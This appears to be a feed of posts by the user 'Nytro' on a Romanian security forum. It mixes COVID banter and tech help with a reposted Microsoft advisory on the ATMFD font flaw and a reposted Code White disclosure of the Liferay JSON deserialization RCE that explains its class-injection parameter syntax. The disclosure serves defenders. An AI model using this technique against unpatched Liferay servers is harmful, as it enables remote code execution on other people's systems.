Nytro

Stay home. Skill up. #FREEapril Build in-demand tech skills without leaving your house. Get free access to 7,000+ expert-led video courses and more all month long. Due to very high demand, redemptions are processing slower than expected. Your confirmation email with login info may take a few hours. SIGN UP NOW Link: https://www.pluralsight.com/offer/2020/free-april-month

Restartati telefoanele sau puneti pe mod avion, asteptati, apoi scoateti modul avion, amandoi. Suna la Telekom, nu ar trebui sa se intample asa, dar e posibil sa fie vreo problema stupida.

Nu vad ce legatura are cu donatiile. Mizerii din acestea pe bani publici se fac dintotdeauna. Negoita din sectorul 3 vrea promovare la TV/radio pe 1 milion de euro, femeia respectiva are doar o firma ceva, dar de fapt o alta firma a luat contractul, Sanimed, prin femeia respectiva, deoarece aveau ceva probleme... Nu e normal, nu stiu nici legal daca e, nu ar trebui, dar nici nu ma mira. Legat de donatii, ce am postat acolo sunt surse in care eu am 100% incredere. Ca sa vezi, exista si oameni care vor sa faca bine in tara asta. Greu de crezut nu? Daca voi nu vreti sa o faceti, nu va obliga nimeni, doar ca sunt si persoane interesate sa dea o mana de ajutor.

Am pus un anunt cu cateva link-uri la care se poate dona. De incredere. Daca aveti si alte sugestii, postati aici sau dati-mi un PM. Dar sa fie de incredere.

Stiti despre ce e vorba; http://www.cybersecuritychallenge.ro/inscriere/

Ca sa calculezi distanta - Google maps. Alegi punctul de pornire si click dreapta - "Location from here" apoi alegi unde mergi si click dreapta - "Location to here". Iti arata distanta cu masina, transport in comun sau chiar mers pe jos. De vizitat ar putea fi multe: saline, vulcani noroiosi, Maramures, Delta, mare, munte. Poti bea spirt in Moldova si manca praz in Oltenia. Depinde ce vrei sa faci. Momentan probabil vei lua amenda daca vrei sa te plimbi. Deci astepti sa treaca perioada, apoi mergi unde vrei.

De ce ai vrea ca guvern, om plin de bani, mason, illuminati sau mai stiu eu ce, ca lumea sa stea in casa? Sa mergi in dezbracat pe strada fara frica de paparazzi? De fapt stiu raspunsul: ca sa poata schimba bateriile la pasari! De fapt nu exista pasari cum le vedem noi, ci sunt roboti care monitorizeaza populatia.

Terminati cu porcariile astea. Ai nevoie de ceva de la Vodafone, suni in call center. Esti pasionat de CRM-uri? Ghici ce? Sunt mii disponibile pe net, nu e doar unul - cel al lui Vodafone. Le poti instala local si faci ce vrei cu ele. Ceea ce vrei tu vine cu niste riscuri foarte mari care probabil nu merita.

Poate fil util: http://droppdf.com/

Are dreptate, voi nu va mai bagati daca nu stiti despre ce e vorba. - Nytro, expert in biologie moleculara, epidemiolog WHO si doctorand in virusologie (am luat si un 5 la algoritmi genetici si aplicatii in bioinformatica la facultate, daca se pune) - Nytro, expert in fizica undelor electromagnetice, autor al standardului 69G(Hz) si doctorand in mecanica cuantica (uneori chiar ascultator de unde radio)

Parerile mele: "Buba cu acest virus este ca ramane cateva ore in gat, o simpla licoare facuta din tuica si propolis - posibil sa-l buleasca, la fel si inlaturarea usturimi din gat - cu un banal ceai caldut din putina menta, miere si putina lamaie, cei infectati posibil sa se trateze cu vitamina C injectabila. " - Fals, la fel ca usturoiul sau uleiurile esentiale sau mai stiu eu ce "Virusul nu este un organism viu, ci o moleculă proteică (ADN)" - Aproape adevarat, e ARN nu ADN "au nevoie de umiditate pentru a rămâne stabile și, mai ales, întuneric" - Fals, nu cred ca stie el ca e lumina aprinsa sau nu. Poate voiau sa spuna ca e posibil sensibil la lumina soarelui, asta a avut rezultate in 1918 aparent, persoanele tratate afara, la soare, au dus-o mai bine In rest, lucrurile postate de @Wav3 par reale si de bun simt. - Nytro, expert in biologie moleculara, epidemiolog WHO si doctorand in virusologie (am luat si un 5 la algoritmi genetici si aplicatii in bioinformatica la facultate, daca se pune)

Cine mai este offtopic - ban permanent.

E destul de urata asta. Zic si eu... Salvati textul de mai jos ca "plm.reg" si dublu click pe el, apoi restart: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] "DisableATMFD"=dword:00000001

Cei care iau etnobotanice isi asuma riscul, o fac pe barba lor, nu e ceva contagios. La fel si comparatiile alea idioate cu "milioane de oameni mor de boli de inima". Da bre, dar nu se transmite si altora. Da, sunt si alte cauze care provoaca decesul multor persoane, unele fiind contagioase (e.g. gripa, varicela sau mai stiu eu ce). Dar fie nu sunt atat de grave, fie exista tratament specific sau vaccinuri. Aici nu exista nimic. Radeti voi, dar o sa vedeti peste 2 saptamani. Sunt destul de sigur ca multi veti avea cunostiinte care nu s-au simtit bine sau au ajuns prin spitale (daca au noroc). Sper sa nu fie cazul de decese... #StatiInPulaMeaAcasa

Citeste o carte. Apoi inca una. Si tot asa. Si in timp ce citesti, fa practic lucrurile pe care le inveti.

Nu va bazati pe faptul ca e doar o gripa. Au aparut tot mai multe cazuri de persoane tinere care au ajuns sa fie intubate. Pare sa conteze si faptul ca o persoana e fumatoare, dar unele persoane, sportive, au trecut prin clipe grele, desi nu fumeaza. Pare ca ibuprofenul poate sa faca mai mult rau decat bine. Ce faceti daca va imbolnaviti? Tratamentul care se da in spital nu se gaseste in farmacii. Asadar, cand o sa se umple spitalele o sa fie nasol. La noi deja e haos in 2-3 spitale: Gerota, Suceava si acum Floreasca. Daca nu si Universitar. Medici putini, echipamente pula. Deci cand luati Paracetamol in loc de Redemsivir, Kalentra si altele, nu va asteptati la aceleasi rezultate. In 2 saptamani chiar consider ca o sa fie rau. Rau de tot. Edit: Vad ca de maine nu se mai iese din casa nici pe zi, decat in acele numite cazuri. Era si timpul... Am vazut multe comentarii de la retardati care cred ca asta e doar o gluma. Sau ca e o conspiratie. Tehnic vorbind, e ca o gripa. Doar ca de 10 ori mai mortala, de 3 ori mai contagioasa si cu simptome de 5 ori mai nasoale. Faceti voi calculele.

Da, probabil nu ii intereseaza banii din moment ce merg acolo... Eu sunt curios ce fac acele firme: au acei 2-3 angajati care fac tot anul research si exploit development, probabil. Si cum fac profit? Acei "bani" sunt frectie, mai ales ca salarii decente in US pleaca de la 150.000$ pe an. Inteleg ca e OK ca marketing, dar nu inteleg complet business-case-ul lor.

Microsoft is aware of limited targeted attacks that could leverage un-patched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released. Two remote code execution vulnerabilities exist in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. Microsoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month. This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers. The operating system versions that are affected by this vulnerability are listed below. Please see the mitigation and workarounds for guidance on how to reduce the risk. Mitigations For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities. Workarounds Disable the Preview Pane and Details Pane in Windows Explorer Disabling the Preview and Details panes in Windows Explorer prevents the automatic display of OTF fonts in Windows Explorer. While this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability. To disable these panes in Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1, perform the following steps: Open Windows Explorer, click Organize, and then click Layout. Clear both the Details pane and Preview pane menu options. Click Organize, and then click Folder and search options. Click the View tab. Under Advanced settings, check the Always show icons, never thumbnails box. Close all open instances of Windows Explorer for the change to take effect. For Windows Server 2016, Windows 10, and Windows Server 2019, perform the following steps: Open Windows Explorer, click the View tab. Clear both the Details pane and Preview pane menu options. Click Options, and then click Change folder and search options. Click the View tab. Under Advanced settings, check the Always show icons, never thumbnails box. Close all open instances of Windows Explorer for the change to take effect. Impact of workaround. Windows Explorer will not automatically display OTF fonts. How to undo the workaround. To re-enable the Preview and Details panes in Windows Explorer for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1: Open Windows Explorer, click Organize, and then click Layout. Select both the Details pane and Preview pane menu options. Click Organize, and then click Folder and search options. Click the View tab. Under Advanced settings, clear the Always show icons, never thumbnails box. Close all open instances of Windows Explorer for the change to take effect. For Windows Server 2016, Windows 10, and Windows Server 2019: Open Windows Explorer, click the View tab. Select both the Details pane and Preview pane menu options. Click Options, and then click Change folder and search options. Click the View tab. Under Advanced settings, clear the Always show icons, never thumbnails box. Close all open instances of Windows Explorer for the change to take effect. Disable the WebClient service Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet. To disable the WebClient Service, perform the following steps: Click Start, click Run (or press the Windows Key and R on the keyboard), type Services.msc and then click OK. Right-click WebClient service and select Properties. Change the Startup type to Disabled. If the service is running, click Stop. Click OK and exit the management application. Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the WebClient service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer. How to undo the workaround. To re-enable the WebClient Service, perform the following steps: Click Start, click Run (or press the Windows Key and R on the keyboard), type Services.msc and then click OK. Right-click WebClient service and select Properties. Change the Startup type to Automatic. If the service is not running, click Start. Click OK and exit the management application. Rename ATMFD.DLL For 32-bit systems: Enter the following commands at an administrative command prompt: cd "%windir%\system32" takeown.exe /f atmfd.dll icacls.exe atmfd.dll /save atmfd.dll.acl icacls.exe atmfd.dll /grant Administrators:(F) rename atmfd.dll x-atmfd.dll Restart the system. For 64-bit systems: Enter the following commands at an administrative command prompt: cd "%windir%\system32" takeown.exe /f atmfd.dll icacls.exe atmfd.dll /save atmfd.dll.acl icacls.exe atmfd.dll /grant Administrators:(F) rename atmfd.dll x-atmfd.dll cd "%windir%\syswow64" takeown.exe /f atmfd.dll icacls.exe atmfd.dll /save atmfd.dll.acl icacls.exe atmfd.dll /grant Administrators:(F) rename atmfd.dll x-atmfd.dll Restart the system. Optional procedure for Windows 8.1 operating systems and below (disable ATMFD): Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe. Method 1 (manually edit the system registry): Run regedit.exe as Administrator. In Registry Editor, navigate to the following sub key (or create it) and set its DWORD value to 1: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\DisableATMFD, DWORD = 1 Close Registry Editor and restart the system. Method 2 (use a managed deployment script): Create a text file named ATMFD-disable.reg that contains the following text: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] "DisableATMFD"=dword:00000001 Run regedit.exe. In Registry Editor, click the File menu and then click Import. Navigate to and select the ATMFD-disable.reg file that you created in the first step. (Note If your file is not listed where you expect it to be, ensure that it has not been automatically given a .txt file extension, or change the dialog’s file extension parameters to All Files). Click Open and then click OK to close Registry Editor. Impact of workaround Applications that rely on embedded font technology will not display properly. Disabling ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change. How to undo the workaround For 32-bit systems: Enter the following commands at an administrative command prompt: cd "%windir%\system32" rename x-atmfd.dll atmfd.dll icacls.exe atmfd.dll /setowner "NT SERVICE\TrustedInstaller" icacls.exe . /restore atmfd.dll.acl Restart the system. For 64-bit systems: Enter the following commands at an administrative command prompt: cd "%windir%\system32" rename x-atmfd.dll atmfd.dll icacls.exe atmfd.dll /setowner "NT SERVICE\TrustedInstaller" icacls.exe . /restore atmfd.dll.acl cd "%windir%\syswow64" rename x-atmfd.dll atmfd.dll icacls.exe atmfd.dll /setowner "NT SERVICE\TrustedInstaller" icacls.exe . /restore atmfd.dll.acl Restart the system. Optional procedure for Windows 8.1 operating systems and below (enable ATMFD): Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe. Method 1 (manually edit the system registry): Run regedit.exe as Administrator. In Registry Editor, navigate to the following sub key and set its DWORD value to 0: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\DisableATMFD, DWORD = 0 Close Registry Editor and restart the system. Method 2 (use a managed deployment script): Create a text file named ATMFD-enable.reg that contains the following text: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] "DisableATMFD"=dword:00000000 Run regedit.exe. In Registry Editor, click the File menu and then click Import. Navigate to and select the ATMFD-enable.reg file that you created in the first step. (Note If your file is not listed where you expect it to be, ensure that it has not been automatically given a .txt file extension, or change the dialog’s file extension parameters to All Files). Click Open and then click OK to close Registry Editor. FAQ Is there an update to address this vulnerability? No, Microsoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month. This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers. Is Microsoft aware of attacks that attempt to leverage this vulnerability? Yes, Microsoft is aware of limited, targeted attacks that attempt to leverage this vulnerability. How would customers receive notification about this issue and updated information from Microsoft when published? Customers who subscribe to Microsoft Technical Security Notifications will receive a notifications whenever new content is published in Microsoft’s Security Update Guide. Find more information about these notifications here: Technical Security Notifications. Do I need an ESU license to receive the update for Windows 7, Windows Server 2008 and Windows Server 2008 R2 for this vulnerability? Yes, to receive the security update for this vulnerability for Windows 7, Windows Server 2008, or Windows Server 2008 R2 you must have an ESU licence. See 4522133 for more information. Why is this update not being released for all Windows 7 customers? Windows 7 reached end of support on January 14, 2020. For more information on Microsoft lifecycle policies, please visit Life Cycle. Is the Outlook Preview Pane an attack vector for this vulnerability? No, the Outlook Preview Pane is NOT an attack vector for this vulnerability Is the Windows Explorer Preview Pane an attack vector for this vulnerability? Yes, the Windows Preview Pane is an attack vector for this vulnerability Is Enhanced Security Configuration, which is on by default on Windows Servers, a mitigation for this vulnerability? No, Enhanced Security Configuration does not mitigate this vulnerability. Acknowledgements Microsoft recognizes the efforts of those in the security community who help us protect customers through coordinated vulnerability disclosure. See acknowledgements for more information. Sursa: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006

Sume mici pentru realizari mari. Dar probabil e mai mult pentru show-off.

Formateaza ca FAT32, ar trebui sa mearga asa. E posibil sa fie NTFS si de aceea sa nu il recunoasca. PS: E posibil ca unele navigatii sa aiba 2 carduri, unul pentru navigatie, altul pentru media.

Solutie pentru a bloca oamenii acasa: https://twitter.com/nixcraft/status/1241003839093784576

Sunt mai multe posibile solutii, insa nu stiu care e cea mai simpla sau cea mai buna. 1. Poti pastra doar fisierele importante (e.g. config, template si mai stiu eu ce) sa stergi tot si sa pui Wordpress curat 2. Poti face un diff intre toate fisierele existente cu un Wordpress curat, probabil e backdoor prin 30 de locuri. Si sa vezi ce fisiere sunt noi 3. Poti da un grep dupa acel site si vezi pe unde apare, dar probabil e obfuscat. Vezi un grep dupa functii gen "eval", "base64" sau mai stiu eu ce Sunt si alte posibilitati probabil.

List: https://www.youtube.com/playlist?list=PLH15HpR5qRsXiPOP3gxN6ultoj0rAR6Yn

Frequently in malware investigations, we come across shellcode used after exploiting a vulnerability or being injected into a process. In this webcast, we'll look at some of the tools and techniques the malware analyst can use to start investigating what the shellcode is attempting to do. Speaker Bio Jim Clausing is a SANS instructor for SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques with nearly 40 years of experience in the IT field including systems and database administration, security, and research in parallel processing and distributed systems. He's spent the past 20 years as a technical consultant and network security architect for AT&T doing malware analysis, forensics, incident response, intrusion detection, system hardening, and botnet tracking.

Liferay Portal JSON Web Service RCE Vulnerabilities Code White has found multiple critical rated JSON deserialization vulnerabilities affecting the Liferay Portal versions 6.1, 6.2, 7.0, 7.1, and 7.2. They allow unauthenticated remote code execution via the JSON web services API. Fixed Liferay Portal versions are 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2. The corresponding vulnerabilities are: CST-7111: RCE via JSON deserialization (LPS-88051/LPE-165981) The JSONDeserializer of Flexjson allows the instantiation of arbitrary classes and the invocation of arbitrary setter methods. CST-7205: Unauthenticated Remote code execution via JSONWS (LPS-97029/CVE-2020-7961) The JSONWebServiceActionParametersMap of Liferay Portal allows the instantiation of arbitrary classes and invocation of arbitrary setter methods. Both allow the instantiation of an arbitrary class via its parameter-less constructor and the invocation of setter methods similar to the JavaBeans convention. This allows unauthenticated remote code execution via various publicly known gadgets. Liferay released the patched versions 6.2 GA6 (6.2.5), 7.0 GA7 (7.0.6) and 7.1 GA4 (7.1.3) to address the issues; the version 7.2 GA2 (7.2.1) was already released in November 2019. For 6.1, there is only a fixpack available. Introduction Liferay Portal is one of the, if not even the most popular portal implementation as per Java Portlet Specification JSR-168. It provides a comprehensive JSON web service API at '/api/jsonws' with examples for three different ways of invoking the web service method: Via the generic URL /api/jsonws/invoke where the service method and its arguments get transmitted via POST, either as a JSON object or via form-based parameters (the JavaScript Example) Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are passed via form-based POST parameters (the curl Example) Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are also passed in the URL like /api/jsonws/service-class-name/service-method-name/arg1/val1/arg2/val2/… (the URL Example) Authentication and authorization checks are implemented within the invoked service methods themselves while the processing of the request and thus the JSON deserialization happens before. However, the JSON web service API can also be configured to deny unauthenticated access. First, we will take a quick look at LPS-88051, a vulnerability/insecure feature in the JSON deserializer itself. Then we will walk through LPS-97029 that also utilizes a feature of the JSON deserializer but is a vulnerability in Liferay Portal itself. CST-7111: Flexjson's JSONDeserializer In Liferay Portal 6.1 and 6.2, the Flexjson library is used for serializing and deserializing data. It supports object binding that will use setter methods of the objects instanciated for any class with a parameter-less constructor. The specification of the class is made with the class object key: {"class":"fully.qualified.ClassName", ... } view raw CST-7111.txt hosted with ❤ by GitHub This vulnerability was reported in December 2018 and has been fixed in the Enterprise Edition with 6.1 EE GA3 fixpack 71 and 6.2 EE GA2 fixpack 1692 and also the 6.2 GA6. CST-7205: Jodd's JsonParser + Liferay Portal's JSONWebServiceActionParametersMap In Liferay Portal 7, the Flexjson library is replaced by the Jodd Json library that does not support specifying the class to deserialize within the JSON data itself. Instead, only the type of the root object can be specified and it has to be explicitly provided by a java.lang.Class object instance. When looking for the call hierarchy of write access to the rootType field, the following unveils: While most of the calls have hard-coded types specified, there is one that is variable (see selected call on the right above). Tracing that parameterType variable through the call hierarchy backwards shows that it originates from a ClassLoader.loadClass(String) call with a parameter value originating from an JSONWebServiceActionParameters instance. That object holds the parameters passed in the web service call. The JSONWebServiceActionParameters object has an instance of a JSONWebServiceActionParametersMap that has a _parameterTypes field for mapping parameters to types. That map is used to look up the class for deserialization during preparation of the parameters for invoking the web service method in JSONWebServiceActionImpl._prepareParameters(Class<?>). The _parameterTypes map gets filled by the JSONWebServiceActionParametersMap.put(String, Object) method: /* */ public Object put(String key, Object value) /* */ { /* 64 */ int pos = key.indexOf(':'); /* */ /* 66 */ if (key.startsWith("-")) { /* */ // [...] /* */ } /* 71 */ else if (key.startsWith("+")) { /* */ // [...] /* */ } /* 101 */ else if (pos != -1) { /* 102 */ String typeName = key.substring(pos + 1); /* */ /* 104 */ key = key.substring(0, pos); /* */ /* 106 */ if (_parameterTypes == null) { /* 107 */ _parameterTypes = new HashMap(); /* */ } /* */ /* 110 */ _parameterTypes.put(key, typeName); /* */ /* 112 */ if (Validator.isNull(GetterUtil.getString(value))) { /* 113 */ value = Void.TYPE; /* */ } /* */ } /* */ /* */ // [...] /* */ /* 142 */ return super.put(key, value); /* */ } view raw JSONWebServiceActionParametersMap.put.java hosted with ❤ by GitHub Here the lines 102 to 110 are interesting: the typeName is taken from the key string passed in. So if a request parameter name contains a ':', the part after it specifies the parameter's type, i. e.: parameterName:fully.qualified.ClassName view raw CST-7205.txt hosted with ❤ by GitHub This syntax is also mentioned in some of the examples in the Invoking JSON Web Services tutorial. Later in JSONWebServiceActionImpl._prepareParameters(Class<?>), the ReflectUtil.isTypeOf(Class, Class) is used to check whether the specified type extends the type of the corresponding parameter of the method to be invoked. Since there are service methods with java.lang.Object parameters, any type can be specified. This vulnerability was reported in June 2019 and has been fixed this in 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2 by using a whitelist of allowed classes. Demo [1] There are two editions of the Liferay Portal: the Community Edition (CE) and the Enterprise Edition (EE). The CE is free and its source code is available at GitHub. Both editions have their own project and issue tracker at issues.liferay.com: CE has LPS-* and EE has LPE-*. LPS-88051 was created confidentially by Code White for CE and LPE-16598 was created publicly three days later for EE. [2] Fixpacks are only available for the Enterprise Edition (EE) and not for the Community Edition (CE). Posted by Markus Wulftange at March 20, 2020 Tags Vulnerability Details Sursa: https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html